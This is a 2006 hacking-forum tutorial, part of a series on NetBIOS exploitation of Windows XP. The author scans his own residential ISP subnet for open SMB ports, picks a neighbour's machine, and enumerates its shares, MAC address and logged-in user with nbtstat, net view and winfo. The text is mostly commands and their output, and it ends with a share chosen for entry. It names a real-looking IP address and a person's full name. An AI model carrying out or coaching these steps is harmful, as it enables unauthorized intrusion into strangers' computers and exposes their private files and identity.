• cracking wep with no clients
  
• crack wep with aircrack + inject packets ( Windows )
  
• how to bug e-mail
  
• aircrack on backtrack with clients ( wep )
  
• writing a port scanner in java
  

• ettercap part 1
  
• ettercap part 2
  
• rainbow tables
  
• social engineering
  
• google security
  

• using truecrypt to lock up your private data
  
• nmap scanning and portsentry evasion
  
• nmap scanning and portsentry evasion 2
  
• windows xp security
  
• php filtering with owasp
  

• quick and simple netbios exploitation with windows xp
  
• quick and simple netbios exploitation with windows xp 2
  
• quick and simple netbios exploitation with windows xp 3
  
• quick and simple netbios exploitation with windows xp 4
  
• quick and simple netbios exploitation with windows xp 5
  

• computertutorials
  
• computertutorials2
  
• securitytutorials
  
• computertutorials3
  
• computertutorials4
  
• securitytutorials2
  
• securitytutorials4
  

QUICK AND SIMPLE NETBIOS EXPLOITATION
WITH WINDOWS XP CONT...

Right, so for the scope of our paper the above target will be considered ‘secure’ and we move on to easier pickings……..back to nmap!

I find it easier to either use the oN/ switch or to right click the top of the command prompt window and go to properties. Once here increase the buffer size to enable you to scroll upwards in the command prompt – otherwise you may not be able to view the entire output.

The best results for this type of crack are usually found in a residential subnet of IP addresses. How do you find one of those? If you’re at home chances are you are in a residential subnet! Take a look at your own IP and use that. When I ran this scan my IP was in the 86.132.223.x range so I scanned that.

Code:
nmap -sS -P0 -v 86.132.223.0-255 -p 139,445


The results for open ports came back as:

Code:
Discovered open port 139/tcp on 86.132.223.96
Discovered open port 139/tcp on 86.132.223.124
Discovered open port 139/tcp on 86.132.223.178
Discovered open port 139/tcp on 86.132.223.227



OK, so now we have a whole host of my neighbours to connect to!

Let choose an IP!

Hmmmmmm 86.132.223.178 I think!

So open up a command prompt and type:

Code:
H:\>nbtstat -a 86.132.223.178

Local Area Connection:
Node IpAddress: [0.0.0.0] Scope Id: []

Host not found.

Wireless Network Connection 3:
Node IpAddress: [192.168.2.6] Scope Id: []

NetBIOS Remote Machine Name Table

Name Type Status
---------------------------------------------
OFFICE <00> UNIQUE Registered
MSHOME <00> GROUP Registered
OFFICE <20> UNIQUE Registered
MSHOME <1E> GROUP Registered

MAC Address = 00-53-45-00-00-00



Ok so we now have the NetBIOS table and the MAC address. We take a look to see if the File Sharing Service is active (<20>). Yep it is.

So, now as we know, we issue the net view command to get a list of the shares….


Code:
H:\>net view 86.132.223.178
Shared resources at 86.132.223.178

OFFICE

Share name Type Used as Comment

-------------------------------------------------------------------------------
bramford photos Disk
BrotherD Print Brother DCP-340CW USB Printer
BrotherD.2 Print BRN_759F2E
johns Disk
PaperPor Print PaperPort Black & White Image
PaperPor.2 Print PaperPort Color Image
Printer Print Imprimante Fax Olitec
Printer4 Print ProgeSOFT PDF Wizard
Printer7 Print Net-It Now! SE for Pressworks
Printer9 Print EPSON PictureMate
SharedDocs Disk
SLAVE (D) Disk
The command completed successfully.



Holy Shit! Look at all those shares.

Now open up a new command prompt and give the following command:

Code:
H:\>winfo 86.132.223.178 -v

Winfo 2.0 - copyright (c) 1999-2003, Arne Vidstrom
- http://www.ntsecurity.nu/toolbox/winfo/


SYSTEM INFORMATION:

- OS version: 5.1

DOMAIN INFORMATION:

- Primary domain (legacy): MSHOME
- Account domain: OFFICE
- Primary domain: MSHOME
- DNS name for primary domain:
- Forest DNS name for primary domain:

PASSWORD POLICY:

Warning: Unable to retrieve password policy.
Reason : Access denied.

LOCOUT POLICY:

Warning: Unable to retrieve lockout policy.
Reason : Access denied.

SESSIONS:

Warning: Unable to retrieve sessions.
Reason : Access denied.

LOGGED IN USERS:

* OFFICE$

* vernon cooper

USER ACCOUNTS:

Warning: Unable to enumerate users.
Reason : Access denied.

WORKSTATION TRUST ACCOUNTS:

Warning: Unable to enumerate workstation trust accounts.
Reason : Access denied.

INTERDOMAIN TRUST ACCOUNTS:

Warning: Unable to enumerate interdomain trust accounts.
Reason : Access denied.

SERVER TRUST ACCOUNTS:

Warning: Unable to enumerate server trust accounts.
Reason : Access denied.

SHARES:

* IPC$

- Type: Unknown
- Remark: Remote IPC

* print$

- Type: Disk drive
- Remark: Printer Drivers

* SharedDocs

- Type: Disk drive
- Remark:

* johns

- Type: Disk drive
- Remark:

* PaperPor.2

- Type: Print queue
- Remark: PaperPort Color Image

* Printer7

- Type: Print queue
- Remark: Net-It Now! SE for Pressworks

* SLAVE (D)

- Type: Disk drive
- Remark:

* Printer4

- Type: Print queue
- Remark: ProgeSOFT PDF Wizard

* PaperPor

- Type: Print queue
- Remark: PaperPort Black & White Image

* BrotherD.2

- Type: Print queue
- Remark: BRN_759F2E

* bramford photos

- Type: Disk drive
- Remark:

* Printer9

- Type: Print queue
- Remark: EPSON PictureMate

* Printer

- Type: Print queue
- Remark: Imprimante Fax Olitec

* BrotherD

- Type: Print queue
- Remark: Brother DCP-340CW USB Printer



As you can see winfo gives us all the shares in an easier to read layout. You can put –n at the end of the winfo command to establish a null session if issuing the command without it does not work.

Ok let’s pick a share….mmmm…johns looks good.

Original Tutorial by nokia for TheTAZZone-TAZForum

Originally posted on September 20th, 2006 here

Do not use, republish, in whole or in part, without the consent of the Author. TheTAZZone policy is that Authors retain the rights to the work they submit and/or post...we do not sell, publish, transmit, or have the right to give permission for such...TheTAZZone merely retains the right to use, retain, and publish submitted work within it's Network.